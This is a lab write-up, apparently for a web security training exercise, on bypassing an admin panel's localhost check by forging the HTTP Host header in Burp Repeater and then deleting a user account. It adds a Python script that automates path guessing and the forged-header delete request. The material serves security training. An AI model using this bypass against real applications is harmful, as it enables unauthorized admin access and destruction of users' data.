While conducting any web application pentest it is good practice to get familiar with the functionality of the application first. Throwing exploits at the target straight away is not just bad practice; it wastes a lot of time and can degrade the application's performance, which is not what we want. The goal is to leave the application more secure (and, where the findings allow, performing better), not to break it.
The goal of this lab is to access the admin panel and delete Carlos’s account.
Knowing the most common locations for an admin page, we can test whether any of them exist on this target.
WordPress-based sites usually use /wp-admin. That is not the case for this lab, so let's try /admin instead.
The response for /admin is not a 404, so now we know where the admin page lives and can work on getting into it.
If you can't guess where the admin panel is, a directory brute-forcer such as GoBuster with a suitable wordlist can be used to find it, but sometimes a simple guess works and saves the noise.
Knowing where the admin panel is, we can now try to get access to it. The admin interface is only meant to be reachable from the local machine, and the application decides that by looking at the Host header, so setting the Host header to "localhost" is the key. In Burp Repeater we change the Host header of our GET /admin request to localhost and send it to the website.
One way to view the result is Repeater's "Show response in browser" option. Once we see the admin panel in the browser and click to delete carlos's account, the website reports that we don't have the privileges for this action.
That happens because the browser sends the delete request with the site's real Host header, not localhost; the check is applied on every request, not only on the one that loaded the panel. One way to deal with it is to find the "delete carlos" request in the HTTP history, send it to Repeater, change its Host header to localhost and send it. This way the request is executed with administrator privileges.
We can then load the admin panel again (again with the Host header set to localhost) to confirm that carlos's account is gone. The lab is solved.
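The same three steps (guess the admin path, load the panel as loopback, and send the delete request with the forged header too) as an added example in plain Python, not code from the original write-up. It speaks raw HTTP so the forged Host header is visible byte for byte, the way it appears in Repeater. The lab base URL comes from the command line, the list of guessed paths is constructed here, and the delete endpoint /admin/delete?username=carlos is an assumption; take the real one from Burp's HTTP history.

```python
# Added example, not code from the original write-up: the Host header
# bypass done with raw HTTP instead of Burp Repeater. The base URL and the
# delete endpoint (/admin/delete?username=carlos) are assumptions.
import socket
import ssl
import sys
from urllib.parse import urlsplit

# Constructed list of paths commonly guessed for an admin panel.
COMMON_ADMIN_PATHS = ["/wp-admin", "/admin", "/administrator", "/admin.php"]


def raw_request(method, path, host):
    """Build the exact bytes sent on the wire. The Host value is whatever
    we choose; this is the one field edited in Repeater in the write-up."""
    return (
        f"{method} {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def parse_status(response):
    """Return the numeric status code from a raw HTTP response."""
    status_line = response.split(b"\r\n", 1)[0]
    return int(status_line.split(b" ", 2)[1])


def classify(status):
    """What one status code tells us about a guessed admin path."""
    if status == 404:
        return "missing"        # keep guessing
    if status in (401, 403):
        return "gated"          # path exists, but access is checked
    if status in (301, 302, 303, 307, 308):
        return "redirect"
    if status == 200:
        return "open"
    return "other"


def _target(base_url):
    """Split the base URL into (real hostname, port, tls?)."""
    u = urlsplit(base_url)
    tls = u.scheme == "https"
    return u.hostname, u.port or (443 if tls else 80), tls


def send_raw(real_host, port, data, use_tls=True):
    """Send data to the real server. TLS SNI still carries the real
    hostname so the connection reaches the right site; only the HTTP Host
    header inside the request is forged."""
    sock = socket.create_connection((real_host, port), timeout=10)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=real_host)
    with sock:
        sock.sendall(data)
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def find_admin_panel(base_url):
    """Step 1: guess the admin path with the honest Host header."""
    host, port, tls = _target(base_url)
    for path in COMMON_ADMIN_PATHS:
        status = parse_status(send_raw(host, port, raw_request("GET", path, host), tls))
        print(f"{path}: {status} ({classify(status)})")
        if classify(status) != "missing":
            return path
    return None


def delete_user_as_loopback(base_url, admin_path, username):
    """Steps 2 and 3: load the panel and issue the delete, each with
    Host: localhost. The check runs per request, so forging the header
    only on the first request (the mistake hit in the write-up) fails."""
    host, port, tls = _target(base_url)
    panel = parse_status(send_raw(host, port, raw_request("GET", admin_path, "localhost"), tls))
    if classify(panel) != "open":
        return False
    # Assumed delete endpoint; copy the real one from Burp's HTTP history.
    delete_path = f"{admin_path}/delete?username={username}"
    status = parse_status(send_raw(host, port, raw_request("GET", delete_path, "localhost"), tls))
    return classify(status) in ("open", "redirect")


if __name__ == "__main__":
    base = sys.argv[1]  # e.g. https://YOUR-LAB-ID.web-security-academy.net
    panel = find_admin_panel(base)
    if panel and delete_user_as_loopback(base, panel, "carlos"):
        print("carlos deleted; reload the panel with Host: localhost to confirm")
    else:
        print("bypass did not work; check the paths and the Host value in Repeater")
```

Note the split between the two "host" values: the TLS handshake still uses the site's real name for SNI so the connection lands on the right virtual host, and only the HTTP Host header inside the request says localhost. That is also why the browser-driven delete failed in the write-up: the browser always sends the real Host, so every privileged request has to be replayed with the forged header.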